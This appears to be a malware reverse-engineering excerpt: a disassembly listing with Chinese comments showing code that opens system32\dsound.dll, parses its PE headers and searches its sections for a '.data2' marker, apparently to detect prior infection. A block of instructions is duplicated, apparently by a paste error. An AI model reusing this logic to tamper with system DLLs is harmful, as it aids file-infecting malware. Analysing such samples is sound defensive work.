00401CF4 |. 6A 00 push 0 ; |Attributes = 0
00401CF6 |. 6A 03 push 3 ; |Mode = OPEN_EXISTING
00401CF8 |. 6A 00 push 0 ; |pSecurity = NULL
00401CFA |. 6A 01 push 1 ; |ShareMode = FILE_SHARE_READ
00401CFC |. 8D5424 24 lea edx, dword ptr [esp+24] ; |
00401D00 |. 68 00000080 push 80000000 ; |Access = GENERIC_READ
00401D05 |. 52 push edx ; |FileName
00401D06 |. FF15 08304000 call dword ptr [<&KERNEL32.CreateFile>; \打开文件%windir%\system\dsound.dll
00401D0C |. 8BF0 mov esi, eax
00401D0E |. 83FE FF cmp esi, -1
00401D11 |. 75 6E jnz short 00401D81 ; 成功则跳
00401D13 |. B9 1E000000 mov ecx, 1E
00401D18 |. 33C0 xor eax, eax
00401D1A |. 8D7C24 10 lea edi, dword ptr [esp+10]
00401D1E |. 6A 7B push 7B ; /BufSize = 7B (123.)
00401D20 |. F3:AB rep stos dword ptr es:[edi] ; |
00401D22 |. 66:AB stos word ptr es:[edi] ; |
00401D24 |. AA stos byte ptr es:[edi] ; |
00401D25 |. 8D4424 14 lea eax, dword ptr [esp+14] ; |
00401D29 |. 50 push eax ; |Buffer
00401D2A |. FFD5 call ebp ; \检索系统文件夹路径
00401D2C |. 8D4C24 10 lea ecx, dword ptr [esp+10]
00401D30 |. 68 7C404000 push 0040407C ; /StringToAdd = "\..\"
00401D35 |. 51 push ecx ; |ConcatString
00401D36 |. FFD3 call ebx ; \连接字符串C:\WINDOWS\system32\
00401D38 |. 8B9424 940000>mov edx, dword ptr [esp+94]
00401D3F |. 8D4424 10 lea eax, dword ptr [esp+10]
00401D43 |. 52 push edx ; /StringToAdd
00401D44 |. 50 push eax ; |ConcatString
00401D45 |. FFD3 call ebx ; \连接字符串%windir%\system32\dsound.dll
00401D47 |. 6A 00 push 0 ; /hTemplateFile = NULL
00401D49 |. 6A 00 push 0 ; |Attributes = 0
00401D4B |. 6A 03 push 3 ; |Mode = OPEN_EXISTING
00401D4D |. 6A 00 push 0 ; |pSecurity = NULL
00401D4F |. 6A 01 push 1 ; |ShareMode = FILE_SHARE_READ
00401D51 |. 8D4C24 24 lea ecx, dword ptr [esp+24] ; |
00401D55 |. 68 00000080 push 80000000 ; |Access = GENERIC_READ
00401D5A |. 51 push ecx ; |FileName
00401D5B |. FF15 08304000 call dword ptr [<&KERNEL32.CreateFile>; \打开文件%windir%\system32\dsound.dll
00401D61 |. 8BF0 mov esi, eax
00401D63 |. 83FE FF cmp esi, -1
00401D66 |. 75 0A jnz short 00401D72 ; 成功则继续
00401D68 |. 5F pop edi
00401D69 |. 5E pop esi
00401D6A |. 5D pop ebp
00401D6B |. 33C0 xor eax, eax
00401D6D |. 5B pop ebx
00401D6E |. 83C4 7C add esp, 7C
00401D71 |. C3 retn
00401D72 |> 8B8424 900000>mov eax, dword ptr [esp+90]
00401D79 |. 8D5424 10 lea edx, dword ptr [esp+10]
00401D7D |. 52 push edx
00401D7E |. 50 push eax
00401D7F |. EB 1C jmp short 00401D9D
00401D81 |> 8B9424 900000>mov edx, dword ptr [esp+90]
00401D88 |. 8D4C24 10 lea ecx, dword ptr [esp+10]
00401D8C |. 51 push ecx
00401D8D |. 52 push edx
00401D8E |. EB 0D jmp short 00401D9D
00401D90 |> 8B8C24 900000>mov ecx, dword ptr [esp+90]
00401D97 |. 8D4424 10 lea eax, dword ptr [esp+10]
00401D9B |. 50 push eax ; /String2
00401D9C |. 51 push ecx ; |String1
00401D9D |> FF15 44304000 call dword ptr [<&KERNEL32.lstrcpyA>] ; \复制%windir%\system32\dsound.dll字符串到0012F288缓冲区
00401DA3 |. 56 push esi ; /hObject
00401DA4 |. FF15 00304000 call dword ptr [<&KERNEL32.CloseHandl>; \关闭句柄
00401DAA |. 5F pop edi
00401DAB |. 5E pop esi
00401DAC |. 5D pop ebp
00401DAD |. B8 01000000 mov eax, 1
00401DB2 |. 5B pop ebx
00401DB3 |. 83C4 7C add esp, 7C
00401DB6 \. C3 retn
004026A1 |. 51 push ecx ; /String
004026A2 |. FFD6 call esi ; \返回缓冲区内%windir%\system32\dsound.dll的长度
004026A4 |. 85C0 test eax, eax
004026A6 |. 7E 3C jle short 004026E4 ; 不存在则跳走
00401600 /$ B8 4C100000 mov eax, 104C
00401605 |. E8 96150000 call 00402BA0
0040160A |. 53 push ebx
0040160B |. 8B8424 541000>mov eax, dword ptr [esp+1054]
00401612 |. 55 push ebp
00401613 |. 56 push esi
00401614 |. 57 push edi
00401615 |. 6A 00 push 0 ; /hTemplateFile = NULL
00401617 |. 68 00000008 push 8000000 ; |Attributes = SEQUENTIAL_SCAN
0040161C |. 6A 03 push 3 ; |Mode = OPEN_EXISTING
0040161E |. 6A 00 push 0 ; |pSecurity = NULL
00401620 |. 6A 01 push 1 ; |ShareMode = FILE_SHARE_READ
00401622 |. 68 00000080 push 80000000 ; |Access = GENERIC_READ
00401627 |. 50 push eax ; |FileName
00401628 |. C74424 34 000>mov dword ptr [esp+34], 0 ; |
00401630 |. FF15 08304000 call dword ptr [<&KERNEL32.CreateFile>; \打开文件%windir%\system32\dsound.dll
00401636 |. 8BF0 mov esi, eax
00401638 |. 83FE FF cmp esi, -1
0040163B |. 75 0D jnz short 0040164A ; 成功则继续
0040163D |. 5F pop edi
0040163E |. 5E pop esi
0040163F |. 5D pop ebp
00401640 |. 33C0 xor eax, eax
00401642 |. 5B pop ebx
00401643 |. 81C4 4C100000 add esp, 104C
00401649 |. C3 retn
0040164A |> 8D4C24 10 lea ecx, dword ptr [esp+10]
0040164E |. 6A 00 push 0 ; /pOverlapped = NULL
00401650 |. 51 push ecx ; |pBytesRead
00401651 |. 8D5424 64 lea edx, dword ptr [esp+64] ; |
00401655 |. 6A 40 push 40 ; |BytesToRead = 40 (64.)
00401657 |. 52 push edx ; |Buffer
00401658 |. 56 push esi ; |hFile
00401659 |. FF15 24304000 call dword ptr [<&KERNEL32.ReadFile>] ; \读取0x40字节到dsound.0012E22C处的数据
0040165F |. 85C0 test eax, eax
00401661 |. 75 14 jnz short 00401677 ; 成功则继续
00401663 |. 56 push esi ; /hObject
00401664 |. FF15 00304000 call dword ptr [<&KERNEL32.CloseHandl>; \关闭句柄
0040166A |. 5F pop edi
0040166B |. 5E pop esi
0040166C |. 5D pop ebp
0040166D |. 33C0 xor eax, eax
0040166F |. 5B pop ebx
00401670 |. 81C4 4C100000 add esp, 104C
00401676 |. C3 retn
00401677 |> 8BBC24 980000>mov edi, dword ptr [esp+98]
0040167E |. 8B2D 28304000 mov ebp, dword ptr [<&KERNEL32.SetFi>; kernel32.SetFilePointer
00401684 |. 6A 00 push 0 ; /Origin = FILE_BEGIN
00401686 |. 6A 00 push 0 ; |pOffsetHi = NULL
00401688 |. 8D5F 28 lea ebx, dword ptr [edi+28] ; |
0040168B |. 53 push ebx ; |OffsetLo
0040168C |. 56 push esi ; |hFile
0040168D |. FFD5 call ebp ; \指针移至文件开头0x110字节处
0040168F |. 8D4424 10 lea eax, dword ptr [esp+10]
00401693 |. 6A 00 push 0 ; /pOverlapped = NULL
00401695 |. 50 push eax ; |pBytesRead
00401696 |. 8D4C24 38 lea ecx, dword ptr [esp+38] ; |
0040169A |. 6A 04 push 4 ; |BytesToRead = 4
0040169C |. 51 push ecx ; |Buffer
0040169D |. 56 push esi ; |hFile
0040169E |. FF15 24304000 call dword ptr [<&KERNEL32.ReadFile>] ; \读取从0x4字节到dsound.0012E22C处的数据
004016A4 |. 85C0 test eax, eax
004016A6 |. 75 14 jnz short 004016BC ; 成功则继续
004016A8 |. 56 push esi ; /hObject
004016A9 |. FF15 00304000 call dword ptr [<&KERNEL32.CloseHandl>; \关闭句柄
004016AF |. 5F pop edi
004016B0 |. 5E pop esi
004016B1 |. 5D pop ebp
004016B2 |. 33C0 xor eax, eax
004016B4 |. 5B pop ebx
004016B5 |. 81C4 4C100000 add esp, 104C
004016BB |. C3 retn
004016BC |> 6A 00 push 0
004016BE |. 6A 00 push 0
004016C0 |. 53 push ebx
004016C1 |. 56 push esi
004016C2 |. FFD5 call ebp ; 指针移至文件开头0x110字节处
004016C4 |. 33D2 xor edx, edx
004016C6 |. 33DB xor ebx, ebx
004016C8 |. 895424 1E mov dword ptr [esp+1E], edx
004016CC |. 53 push ebx
004016CD |. 895424 26 mov dword ptr [esp+26], edx
004016D1 |. 8D47 04 lea eax, dword ptr [edi+4]
004016D4 |. 895424 2A mov dword ptr [esp+2A], edx
004016D8 |. 53 push ebx
004016D9 |. 895424 32 mov dword ptr [esp+32], edx
004016DD |. 50 push eax
004016DE |. 56 push esi
004016DF |. 66:895C24 2C mov word ptr [esp+2C], bx
004016E4 |. 66:895424 3E mov word ptr [esp+3E], dx
004016C4 |. 33D2 xor edx, edx
004016C6 |. 33DB xor ebx, ebx
004016C8 |. 895424 1E mov dword ptr [esp+1E], edx
004016CC |. 53 push ebx
004016CD |. 895424 26 mov dword ptr [esp+26], edx
004016D1 |. 8D47 04 lea eax, dword ptr [edi+4]
004016D4 |. 895424 2A mov dword ptr [esp+2A], edx
004016D8 |. 53 push ebx
004016D9 |. 895424 32 mov dword ptr [esp+32], edx
004016DD |. 50 push eax
004016DE |. 56 push esi
004016DF |. 66:895C24 2C mov word ptr [esp+2C], bx
004016E4 |. 66:895424 3E mov word ptr [esp+3E], dx
004016E9 |. FFD5 call ebp ; 指针移至文件开头0xEC字节处
004016EB |. 8D4C24 10 lea ecx, dword ptr [esp+10]
004016EF |. 53 push ebx ; /pOverlapped
004016F0 |. 51 push ecx ; |pBytesRead
004016F1 |. 8D5424 24 lea edx, dword ptr [esp+24] ; |
004016F5 |. 6A 14 push 14 ; |BytesToRead = 14 (20.)
004016F7 |. 52 push edx ; |Buffer
004016F8 |. 56 push esi ; |hFile
004016F9 |. FF15 24304000 call dword ptr [<&KERNEL32.ReadFile>] ; \读取从开头0x14字节到dsound.0012E22C的数据
004016FF |. 81C7 F8000000 add edi, 0F8
00401705 |. 53 push ebx
00401706 |. 53 push ebx
00401707 |. 57 push edi
00401708 |. 56 push esi
00401709 |. FFD5 call ebp ; 指针移至开头0x1E0字节处
0040170B |. 66:395C24 1E cmp word ptr [esp+1E], bx
00401710 |. 76 7B jbe short 0040178D
00401712 |. 83C7 28 add edi, 28
00401715 |. 897C24 14 mov dword ptr [esp+14], edi
00401719 |> B9 09000000 /mov ecx, 9
0040171E |. 33C0 |xor eax, eax
00401720 |. 8D7C24 35 |lea edi, dword ptr [esp+35]
00401724 |. C64424 34 00 |mov byte ptr [esp+34], 0
00401729 |. F3:AB |rep stos dword ptr es:[edi]
0040172B |. 66:AB |stos word ptr es:[edi]
0040172D |. AA |stos byte ptr es:[edi]
0040172E |. 8D4424 10 |lea eax, dword ptr [esp+10]
00401732 |. 6A 00 |push 0 ; /pOverlapped = NULL
00401734 |. 50 |push eax ; |pBytesRead
00401735 |. 8D4C24 3C |lea ecx, dword ptr [esp+3C] ; |
00401739 |. 6A 28 |push 28 ; |BytesToRead = 28 (40.)
0040173B |. 51 |push ecx ; |Buffer
0040173C |. 56 |push esi ; |hFile
0040173D |. FF15 24304000 |call dword ptr [<&KERNEL32.ReadFile>>; \读取0x28字节到dsound.0012E22C的数据
00401743 |. 8D5424 34 |lea edx, dword ptr [esp+34]
00401747 |. 68 50404000 |push 00404050 ; /s2 = ".data2"
0040174C |. 52 |push edx ; |s1
0040174D |. FF15 A4304000 |call dword ptr [<&MSVCRT._stricmp>] ; \比较字符串区段名和.data2
00401753 |. 83C4 08 |add esp, 8
00401756 |. 85C0 |test eax, eax
00401758 |. 74 23 |je short 0040177D ; 找到.data2则跳走
0040175A |. 8B7C24 14 |mov edi, dword ptr [esp+14]
0040175E |. 6A 00 |push 0
00401760 |. 6A 00 |push 0
00401762 |. 57 |push edi
00401763 |. 56 |push esi
00401764 |. FFD5 |call ebp ; 将指针移至下一个区段起始处
00401766 |. 8B4424 1E |mov eax, dword ptr [esp+1E]
0040176A |. 43 |inc ebx
0040176B |. 25 FFFF0000 |and eax, 0FFFF
00401770 |. 83C7 28 |add edi, 28
00401773 |. 3BD8 |cmp ebx, eax
00401775 |. 897C24 14 |mov dword ptr [esp+14], edi
00401779 |.^ 7C 9E \jl short 00401719 ; 循环读取区段,比较
0040177B |. EB 10 jmp short 0040178D ; 没有找到则结束
0040177D |> \8B4424 40 mov eax, dword ptr [esp+40]
00401781 |. 85C0 test eax, eax
00401783 |. 74 08 je short 0040178D
00401785 |. C74424 18 010>mov dword ptr [esp+18], 1
0040178D |> 56 push esi ; /hObject
0040178E |. FF15 00304000 call dword ptr [<&KERNEL32.CloseHandl>; \关闭句柄
00401794 |. 8B4424 18 mov eax, dword ptr [esp+18]
00401798 |. 5F pop edi
00401799 |. 5E pop esi
0040179A |. 5D pop ebp
0040179B |. 5B pop ebx
0040179C |. 81C4 4C100000 add esp, 104C
004017A2 \. C3 retn
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
